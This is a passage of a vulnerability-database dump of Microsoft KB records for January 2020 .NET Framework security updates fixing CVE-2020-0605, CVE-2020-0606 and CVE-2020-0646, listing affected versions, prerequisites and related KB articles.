Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see <span><span><a href=\"https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update\">KB 4474419</a>. </span></span></li> <li> All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div><span>The following articles contain additional information about this update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span> <a href=\"https://support.microsoft.com/help/4532960\" managed-link=\"\">4532960</a> <span>Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532960)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4532964\" managed-link=\"\">4532964</a> <span>Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532964)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4532971\" managed-link=\"\">4532971</a> <span>Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4532971)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4532952\" managed-link=\"\">4532952</a> <span>Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4532952)</span> </span></li></ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:29", "id": "KB4534976", "href": "https://support.microsoft.com/en-us/help/4534976/", "published": "2020-01-14T17:56:29", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4534976)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:41:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4534978)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> <span>As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see </span> <a href=\"https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations \">Microsoft .NET Framework 3.5 Deployment Considerations.</a> </li> <li> All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532961\" managed-link=\"\">4532961</a> <span>Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4532961)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532962\" managed-link=\"\">4532962</a> <span>Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532962)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532970\" managed-link=\"\">4532970</a> <span>Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532970)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532951\" managed-link=\"\">4532951</a> <span>Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4532951)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:28", "id": "KB4534978", "href": "https://support.microsoft.com/en-us/help/4534978/", "published": "2020-01-14T17:56:28", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4534978)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:13", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4535101 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 3.5, 4.7.2 and 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532947\" managed-link=\"\">4532947</a> <span>Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4532947)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532937\" managed-link=\"\">4532937</a> <span>Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4532937)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:27", "id": "KB4535101", "href": "https://support.microsoft.com/en-us/help/4535101/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4535101 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:40:30", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4535104)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> <span>As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see </span> <a href=\"https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations \">Microsoft .NET Framework 3.5 Deployment Considerations.</a> </li> <li> All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532946\" managed-link=\"\">4532946</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532946)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532927\" managed-link=\"\">4532927</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532927)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532931\" managed-link=\"\">4532931</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532931)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532940\" managed-link=\"\">4532940</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532940)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 7, "modified": "2020-01-14T17:56:26", "id": "KB4535104", "href": "https://support.microsoft.com/en-us/help/4535104/", "published": "2020-01-14T17:56:26", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4535104)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:40:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4535103)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532943\" managed-link=\"\">4532943</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4532943)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532928\" managed-link=\"\">4532928</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4532928)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532930\" managed-link=\"\">4532930</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532930)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532939\" managed-link=\"\">4532939</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4532939)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 7, "modified": "2020-01-14T17:56:26", "id": "KB4535103", "href": "https://support.microsoft.com/en-us/help/4535103/", "published": "2020-01-14T17:56:26", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4535103)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:52:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4535105)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see <span><span><a href=\"https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update\">KB 4474419</a>. </span></span></li> <li> All updates for .NET Framework 4.6 for Windows Server 2008 Service Pack 2 (SP2) require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532944\" managed-link=\"\">4532944</a> <span>Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4532944)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532929\" managed-link=\"\">4532929</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2008 SP2 (KB4532929)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532932\" managed-link=\"\">4532932</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows Server 2008 SP2 (KB4532932)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 8, "modified": "2020-01-14T17:56:26", "id": "KB4535105", "href": "https://support.microsoft.com/en-us/help/4535105/", "published": "2020-01-14T17:56:26", "title": "Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4535105)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:35:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4532936 